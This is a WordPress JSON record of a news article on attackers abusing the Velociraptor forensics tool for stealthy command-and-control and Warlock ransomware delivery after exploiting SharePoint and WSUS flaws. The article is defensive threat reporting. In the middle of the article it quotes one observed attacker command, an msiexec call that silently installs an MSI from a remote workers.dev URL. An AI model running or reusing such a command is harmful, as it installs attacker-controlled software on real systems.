{"id":8928,"date":"2025-12-04T10:00:53","date_gmt":"2025-12-04T10:00:53","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/12\/04\/hackers-leverage-velociraptor-dfir-tool-for-stealthy-c2-ransomware-delivery\/"},"modified":"2025-12-04T10:00:53","modified_gmt":"2025-12-04T10:00:53","slug":"hackers-leverage-velociraptor-dfir-tool-for-stealthy-c2-ransomware-delivery","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/12\/04\/hackers-leverage-velociraptor-dfir-tool-for-stealthy-c2-ransomware-delivery\/","title":{"rendered":"Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery"},"content":{"rendered":"\n
Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery<\/div>\n

\t

\n
<\/BR>
\n
\n \t

\n
<\/BR><\/p>\n

\n

Legitimate administrative tools are increasingly becoming the weapon of choice for sophisticated threat actors aiming to blend in with normal network activity.<\/p>\n

A recent campaign has highlighted this dangerous trend, where attackers are weaponizing Velociraptor, a widely respected Digital Forensics and Incident Response (DFIR) tool.<\/p>\n

By deploying this software, adversaries effectively establish stealthy Command and Control (C2) channels, allowing them to execute arbitrary commands and maintain persistent access to compromised environments without triggering traditional security alarms.<\/p>\n

The attacks, observed throughout late 2025, leverage critical vulnerabilities in widely used enterprise infrastructure, specifically targeting Windows Server Update Services (WSUS) and Microsoft SharePoint.<\/p>\n

Once inside, the actors deploy Velociraptor to facilitate lateral movement and, in confirmed cases, deliver the Warlock ransomware.<\/p>\n

This dual-use strategy complicates detection, as the presence of forensic tools<\/a> often signals remediation rather than active compromise.<\/p>\n

Huntress security analysts identified<\/a> this evolving tradecraft after investigating three distinct incidents between September and November.<\/p>\n

Their research linked specific indicators, such as the hostname DESKTOP-C1N9M, to the financially motivated threat cluster Storm-2603.<\/p>\n

The attackers demonstrated a high level of operational security, utilizing Cloudflare tunnels and digitally signed binaries to bypass endpoint defenses<\/a> and evade network blocklists.<\/p>\n

Exploiting SharePoint for Stealthy Access<\/strong><\/h2>\n

The infection chain prominently features the exploitation of the \u201cToolShell\u201d vulnerability chain in Microsoft SharePoint.<\/p>\n

Attackers first bypass authentication using CVE-2025-49706 by sending specially crafted HTTP POST requests to \/_layouts\/15\/ToolPane.aspx. Following this, they chain a secondary remote code execution vulnerability (CVE-2025-49704) to modify default files like start.aspx into malicious web shells.<\/p>\n

\n
\"\"
IIS Access Logs for SharePoint Server (Source \u2013 Huntress)<\/figcaption><\/figure>\n<\/div>\n

This illustrates the suspicious IIS logs revealing these unauthorized requests within the \/_layouts\/15\/ directory.<\/p>\n

Once the web shell is active, the threat actors execute commands to download and install Velociraptor via Windows Installer<\/a>. A typical command observed in these attacks is:<\/p>\n

msiexec \/q \/i https:\/\/royal-boat-bf05.qgtxtebl.workers.dev\/v3.msi<\/p>\n

This installation registers Velociraptor as a system service, ensuring persistence<\/a> across reboots. Besides this, the Autorun depicts the creation of this autorun service.<\/p>\n

\n
\"Autorun
Autorun created for Velociraptor to run as a Windows service (Source \u2013 Huntress)<\/figcaption><\/figure>\n<\/div>\n

To further entrench their position, the attackers use the compromised Velociraptor instance to run Base64 encoded PowerShell commands<\/a>.<\/p>\n

These scripts download Visual Studio Code (code.exe) to create outbound tunnels, effectively masking their malicious traffic within legitimate development activity.<\/p>\n

\n
\"VS
VS Code logs for tunnel creation (Source \u2013 Huntress)<\/figcaption><\/figure>\n<\/div>\n

The VS Code logs highlight the events generated during this tunnel-creation process, showing how the actors pivot from forensic tool abuse to complete network domination.<\/p>\n

Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n

The post Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n

\t

\n
<\/BR>
\n Tushar Subhra Dutta
\n \t

\n
<\/BR>
\nGo to cyber-security-news<\/a>
\n \t

\n
<\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"

Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery Legitimate administrative tools are increasingly becoming the weapon of choice for sophisticated threat actors aiming to blend in with normal network activity. A recent campaign has highlighted this dangerous trend, where attackers are weaponizing Velociraptor, a widely respected Digital Forensics and Incident Response (DFIR) […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-8928","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/8928"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=8928"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/8928\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=8928"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=8928"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=8928"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}